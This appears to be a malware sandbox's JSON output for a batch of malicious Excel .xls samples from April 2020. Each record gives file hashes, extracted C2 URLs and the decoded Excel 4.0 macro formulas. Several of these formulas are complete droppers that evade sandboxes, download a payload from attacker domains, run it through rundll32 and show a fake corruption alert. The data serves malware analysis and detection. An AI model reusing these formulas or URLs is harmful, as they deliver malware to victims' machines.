{"version":"0.2","sample":{"sample":"","kind":"file","target":"4644a437140af8648d4aac4787acdbee2f3f4c1693962011bc7f7dc02326ff42"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"4644a437140af8648d4aac4787acdbee2f3f4c1693962011bc7f7dc02326ff42","filesize":113664,"md5":"8be194a00c61c8e7ec5d28bd56b1b4da","sha1":"b0832bc129be5aec4fee3d596faade79817995f5","sha256":"4644a437140af8648d4aac4787acdbee2f3f4c1693962011bc7f7dc02326ff42","sha512":"4602742ddf9626a51032e27e09ffbb3fb2b17ebecd86a6fd440838ce0987e6b20fa0ec60a397f6eb90e691d92dae0975f873d9e8cee7a81b2d1df6f954199205","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4644a437140af8648d4aac4787acdbee2f3f4c1693962011bc7f7dc02326ff42.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ueEJRXL11G\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4649ce526d8b7da6ed7e014b5688b3e4a31739b922f14fcf47c307b87125dd02"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"4649ce526d8b7da6ed7e014b5688b3e4a31739b922f14fcf47c307b87125dd02","filesize":104448,"md5":"f2158c3d06e0b9c82359b0ac860406b4","sha1":"91a77089b3cce61e2b8fc48dc554f95cdb903493","sha256":"4649ce526d8b7da6ed7e014b5688b3e4a31739b922f14fcf47c307b87125dd02","sha512":"3120a35179d7bb5adcaf6226dea20f17810d962812229520f00684349a14345597eb9771abec3997e2f76f4e24b1ca782b5957280ebdc32541cc39600e012514","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4649ce526d8b7da6ed7e014b5688b3e4a31739b922f14fcf47c307b87125dd02.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"sZEa1zErT6\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46505c3e0063dfa4b647cbe04e6813e50583b3488f1c0fa27caac8ef8a8c482d"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"46505c3e0063dfa4b647cbe04e6813e50583b3488f1c0fa27caac8ef8a8c482d","filesize":212992,"md5":"cb44bf09d928b1ee346d7fdb9900b82a","sha1":"8dd09cb739225c945ab7000ab01862ba64c53209","sha256":"46505c3e0063dfa4b647cbe04e6813e50583b3488f1c0fa27caac8ef8a8c482d","sha512":"8fd8a839f830ff65b5811368be97afd19481faa2ea5ed5bc52f31a48911834ed386a25d9007647daf7b768aa533220a006057f0eb3fb95adea73171b3b500f51","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46505c3e0063dfa4b647cbe04e6813e50583b3488f1c0fa27caac8ef8a8c482d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LtnzbhrDea\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46553d9c94d7bdead37488c4bf04c31e21c85e96b38737bb3ba0a55971eb0a8e"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"46553d9c94d7bdead37488c4bf04c31e21c85e96b38737bb3ba0a55971eb0a8e","filesize":185344,"md5":"b83eb4ec3944bdaec48ab96fe633e7e6","sha1":"7f91b30942d2c6b5b6059817d51fdac96d181b6f","sha256":"46553d9c94d7bdead37488c4bf04c31e21c85e96b38737bb3ba0a55971eb0a8e","sha512":"fb1f8c9b7a4f02274f1256183f6ee5ae22dd32347e2b1db00ad19d801f65360aa2a11ab39747790f927f6492bdffbb51e728c80abcb99b0eda503d982fe76105","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46553d9c94d7bdead37488c4bf04c31e21c85e96b38737bb3ba0a55971eb0a8e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46591ea8843361fdd5884c037a01e834e0f8aba6d589e9b7d36277c4d8808b8a"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"46591ea8843361fdd5884c037a01e834e0f8aba6d589e9b7d36277c4d8808b8a","filesize":206336,"md5":"ba9fdb64bdf242fc0c6c3a846e879676","sha1":"276d30d8bbd2a655b9949c6ae10edf87a224bb3b","sha256":"46591ea8843361fdd5884c037a01e834e0f8aba6d589e9b7d36277c4d8808b8a","sha512":"d551770d6423df71e2f2a1ecf5b6f90b2b3e44db226bd37a7c06f787c0449c88adb24983271c85739be63006104fc2c93ce06afe6334de61f36af1cd9f324157","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46591ea8843361fdd5884c037a01e834e0f8aba6d589e9b7d36277c4d8808b8a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PALv15FXac\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4661c2ad2253c51553caa81df18a28f088b6190e789ca968d3cdcb4eb5f4a81c"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"4661c2ad2253c51553caa81df18a28f088b6190e789ca968d3cdcb4eb5f4a81c","filesize":185344,"md5":"e9f8ceb3e7787f61b6240381708e4131","sha1":"99637e6bd02949b692bd04af14550fd5feb0f152","sha256":"4661c2ad2253c51553caa81df18a28f088b6190e789ca968d3cdcb4eb5f4a81c","sha512":"c074cb301b5d1a7d6a141d2c1aa697e58f422cd3a10d942d2d48437c910d197c18cbdc57d47e57a3bb2500912e19dd820cfb7ea5fb60ef5379ea7e1027bfd9c8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4661c2ad2253c51553caa81df18a28f088b6190e789ca968d3cdcb4eb5f4a81c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"466ab376205f07e813bf8a0f69fad27786ea66ffad7c98bf1098fed1bcd345cc"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"466ab376205f07e813bf8a0f69fad27786ea66ffad7c98bf1098fed1bcd345cc","filesize":167936,"md5":"cf4e0060be513c56c30e54b7958eae29","sha1":"47798b5ecc3b2e70e01053cdaa3aa8fad4b0a388","sha256":"466ab376205f07e813bf8a0f69fad27786ea66ffad7c98bf1098fed1bcd345cc","sha512":"f71bc7664563c9de95d2910a22bd59706f680bc242b9ac577409f359404f04682303be9722ae9157e70dc9619cd807bd662354c859b1734772e155efc6dfc30a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"466ab376205f07e813bf8a0f69fad27786ea66ffad7c98bf1098fed1bcd345cc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CPvrAjF42c\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"468ce7f20b030600bf793d6d7b549776c0d8089ee7659bebe9c62170e8f52c89"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"468ce7f20b030600bf793d6d7b549776c0d8089ee7659bebe9c62170e8f52c89","filesize":206336,"md5":"9dd50b9d2083d92926d9df27cd728871","sha1":"bb381df19c30188b088df9b0d2340e3020dc6286","sha256":"468ce7f20b030600bf793d6d7b549776c0d8089ee7659bebe9c62170e8f52c89","sha512":"f12a4d51afd604c75f6e1de1d007150085e2829724babec6798bdb4704de022ea941d909a488ed02d4a95db9f7105def9d3c34653f89090590b80ea66b12a173","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"468ce7f20b030600bf793d6d7b549776c0d8089ee7659bebe9c62170e8f52c89.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3DAWPJRU6x\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46949a546bc622154fcbfd26a951a9cd34210c06d0811f804b839147e3e5f87b"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"46949a546bc622154fcbfd26a951a9cd34210c06d0811f804b839147e3e5f87b","filesize":167936,"md5":"7a1139b952884b39ad1f7a0d5ba1c6a5","sha1":"f3389e2299f890c2c10f264900b6518f2aeb2f73","sha256":"46949a546bc622154fcbfd26a951a9cd34210c06d0811f804b839147e3e5f87b","sha512":"f859df7fe6a1bf82788a2006a599ad2133dd95c21c096e10034b3b3396d7ab916664e807b64ae4b6234025e7aaf1b14fd1c50d494e136ec510427c25f7435ee1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46949a546bc622154fcbfd26a951a9cd34210c06d0811f804b839147e3e5f87b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Smr7kjapzJ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46a019bb1e847ff294d038c04525469721a1f065d58009ccca83d87b3da27621"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"46a019bb1e847ff294d038c04525469721a1f065d58009ccca83d87b3da27621","filesize":145920,"md5":"30061767a3e5beb561f01be7e20cd0d7","sha1":"a6654c5caeaf581a891400f7bed5c797e19390bd","sha256":"46a019bb1e847ff294d038c04525469721a1f065d58009ccca83d87b3da27621","sha512":"ea7f95586280691ae5e84736fa1eacbd224cbb7217e10202b6207ebd43493828c28ab2d5d2588ab7b3274d3c3be8cbd42eb4080ca78e37bd61c4583752fa0dd4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46a019bb1e847ff294d038c04525469721a1f065d58009ccca83d87b3da27621.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"wwiI1HDoHX\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46a39540330dffa6883cdcc15795903eb731f58f4ec383068b962f3f07a950cf"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"46a39540330dffa6883cdcc15795903eb731f58f4ec383068b962f3f07a950cf","filesize":170496,"md5":"e9c5be932a098741eed14631b2fe64c8","sha1":"2a554f75b10e3033fb82e6436cc63e1a3284d306","sha256":"46a39540330dffa6883cdcc15795903eb731f58f4ec383068b962f3f07a950cf","sha512":"8101377955da2d888c9fc7b71e21301910e81c1c32989b8a76233c2b1a738ae9d11c7630fbebc69ce6234c47af8c02623156585a59be67877acb6c2e69c45e25","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46a39540330dffa6883cdcc15795903eb731f58f4ec383068b962f3f07a950cf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZLqtLsXrlq\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46a43be46d1915f35f7475d8f96c4d685a753fc3fc1f7588c622f5468c3e50c6"},"analysis":{"reported":"2020-04-09T16:16:06Z","score":10},"files":[{"filename":"46a43be46d1915f35f7475d8f96c4d685a753fc3fc1f7588c622f5468c3e50c6","filesize":170496,"md5":"57604b6d930ad230b3c1a3db93aaf21b","sha1":"cbed600b8dcf0a993b20b9a93b3ec65f9635d500","sha256":"46a43be46d1915f35f7475d8f96c4d685a753fc3fc1f7588c622f5468c3e50c6","sha512":"ee691f4471ccc69c0774a121d83c4c974c9c0029a456775a0af6605782ce4f8dad3cc7d0d28587242e1c9f51bc343f577cc7326f38d5b7a883687374c1275948","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46a43be46d1915f35f7475d8f96c4d685a753fc3fc1f7588c622f5468c3e50c6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hsWFd7zzFn\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46a9b7fd0642a6dda4764e4a51ac16411edbc146d8bb4dcae9d84df53a86d04d"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"46a9b7fd0642a6dda4764e4a51ac16411edbc146d8bb4dcae9d84df53a86d04d","filesize":185344,"md5":"aa2873482a8f1be0122067af80e23017","sha1":"4319d941122245b9f3fdd1c003730cbd805f8c69","sha256":"46a9b7fd0642a6dda4764e4a51ac16411edbc146d8bb4dcae9d84df53a86d04d","sha512":"302a68a01093a72b3d86fe12dcfaa0342daba789f6ae1651b20396518b8e9b32699d3c1b3f1eb0e9fedbb60c7af570ca3ca6603d76e8a4835afaddfccacb2c19","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46a9b7fd0642a6dda4764e4a51ac16411edbc146d8bb4dcae9d84df53a86d04d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46b72e9a899631d1c359bc7cafeaa772454ae77fa0788973f1694445fd5d2e8b"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"46b72e9a899631d1c359bc7cafeaa772454ae77fa0788973f1694445fd5d2e8b","filesize":142848,"md5":"83b13d8eef348d0f6505907dd663fa08","sha1":"263381719d555c367925dd3e89b07878db5b65fd","sha256":"46b72e9a899631d1c359bc7cafeaa772454ae77fa0788973f1694445fd5d2e8b","sha512":"ab789dce36024235427f62c0c665ad8d9c347f69e7abb996628b9034d9b71e06cb1e84c395db0ed0b32b2d81aa406c8e11758b04513e22e2f6584960cdd7d78f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46b72e9a899631d1c359bc7cafeaa772454ae77fa0788973f1694445fd5d2e8b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ZubX9ZuTxV\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46c26f020a631e4dcecb90a2989c57d23792dcb90bc898fd4e32482fe73533de"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"46c26f020a631e4dcecb90a2989c57d23792dcb90bc898fd4e32482fe73533de","filesize":185344,"md5":"ee24b9027aa8e0827d32e2ae1fc4c73a","sha1":"92f469646617e848b763a84590e30d19e5c7a8e0","sha256":"46c26f020a631e4dcecb90a2989c57d23792dcb90bc898fd4e32482fe73533de","sha512":"79705b66dd7f35cc6af4a45e397aa93bf1bd18fdf3c24ec14b07d8939e1cda9b0e65258a3e4be65fb428dcd5875ac07468129285bf9a877a8ffb230a0091a117","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46c26f020a631e4dcecb90a2989c57d23792dcb90bc898fd4e32482fe73533de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"46d10dc5b64ce8a3000717a866542a27d5c7ba548f4ba7c66d7ec89a106a7151"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"46d10dc5b64ce8a3000717a866542a27d5c7ba548f4ba7c66d7ec89a106a7151","filesize":209920,"md5":"36aad978a1c7a20bc75e9392cf14924b","sha1":"13fc8b37e0072b022f9855eccbab252bce30df11","sha256":"46d10dc5b64ce8a3000717a866542a27d5c7ba548f4ba7c66d7ec89a106a7151","sha512":"59574a625b24cdd8604c99a5f974f37e8206d66c4969c20cc394da8e477fcb70c817cb36ed88567aaa7f8feefb48c277685e99153f18eb690a80a9e82741dabc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46d10dc5b64ce8a3000717a866542a27d5c7ba548f4ba7c66d7ec89a106a7151.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"C1Sj2pZ72f\",TRUE)\nGOTO(R$0C$16)"}}}]}
